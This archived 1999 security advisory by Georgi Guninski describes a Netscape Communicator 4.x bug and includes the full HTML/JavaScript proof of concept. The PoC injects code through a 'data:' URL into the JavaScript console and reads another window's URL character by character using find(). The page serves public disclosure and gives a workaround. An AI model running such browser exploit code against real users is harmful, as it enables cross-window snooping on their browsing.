Lucene search
netscape.datatrack.txt
🗓️ 17 Aug 1999 00:00:00Reported by Georgi GuninskiType 
packetstorm🔗 packetstormsecurity.com👁 15 Views
Netscape Communicator bug allows URL sniffing via JavaScript console using "data:" protocol. Workaround: disable JavaScript.
Show more
`Date: Sun, 6 Jun 1999 13:17:04 +0300
From: Georgi Guninski <[email protected]>
To: [email protected]
Subject: Netscape Communicator code injection in JavaScript console using "data:" protocol
There is a bug in Netscape Communicator 4.6 Win95, 4.07 Linux (probably
all 4.x are affected), which allows sniffing URLs from another window.
The problem is the injection of JavaScript code in the JavaScript
console using the "data:" protocol.
Access to document.links is disallowed in NC 4.6, but the document may
be read using find().
For more information, examine the source.
Workaround: Disable Javascript.
Demonstration is available at: http://www.nat.bg/~joro/datatrack.html
Regards,
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski
-----------------------------------------------------------------------
<http://www.nat.bg/~joro/datatrack.html>
<HTML>
<HEAD>
<TITLE>
Control Window
</TITLE>
</HEAD>
<BODY>
<BR>
There is a bug in Netscape Communicator 4.6 Win95, 4.07 Linux (probably others?), which allows sniffing URLs from another window.<BR>
The problem is the injection of JavaScript code in the JavaScript console using "data:" protocol.<BR>
Access to document.links is disallowed in NC 4.6, but the document may be read using find().<BR>
Type your URL in the "Tracked window" and then click "Show URL" in this window.<BR>
Workaround: Disable Javascript.
<BR>
<HR>
<A HREF="javascript:datatrack()">Show URL</A>
<HR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<BR>
<BR>
<BR>
<BR>
<BR>
<SCRIPT>
// Clear console
s='wysiwyg://1/data:text/html;,<SCRIPT>window.location = "javascript:@clear"; if (window.location=="JavaScript:@print") top.close(); error</'+'SCRIPT>';
b=window.open(s);
location="javascript:";
setTimeout("b.close();",2000);
/*
a=window.open('wysiwyg://1/about:blank');
a.location="javascript:MBEGIN";
setTimeout("a.close();",2000);
*/
tracked=window.open();
tracked.document.open();
tracked.document.write("<HTML><HEAD><TITLE>Tracked window</TITLE></HEAD>");
tracked.document.write("There is a bug in Netscape Communicator 4.6/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>");
tracked.document.write("Type your URL in the location bar or choose a bookmark.<BR>");
tracked.document.write("Wait until the document is loaded, then click 'Show URL' in the 'Control window'.<BR>");
tracked.document.write("This exploit needs Javascript enabled.<BR>");
tracked.document.close();
</SCRIPT>
<SCRIPT>
function datatrack()
{
tracked.location="javascript:error";
s="wysiwyg://1/data:text/html;,"
+"<SCRIPT> if (document.links.length > 1) "
+"{ "
+" mend='MEND';mag='http://';res=mag;charstoread=40;"
+" msg='Your URL is: \\n';"
+ "setTimeout( ' "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
+" if (c==32) i=charstoread;"
+" } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"confirm(msg+res);top.close();"
+" ',4000);"
+" } else MEND;</"
+"SCRIPT>";
a=window.open(s);
setTimeout('location="javascript:";',3000);
setTimeout('a.close();',2000);
}
</SCRIPT>
</BODY>
</HTML>
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4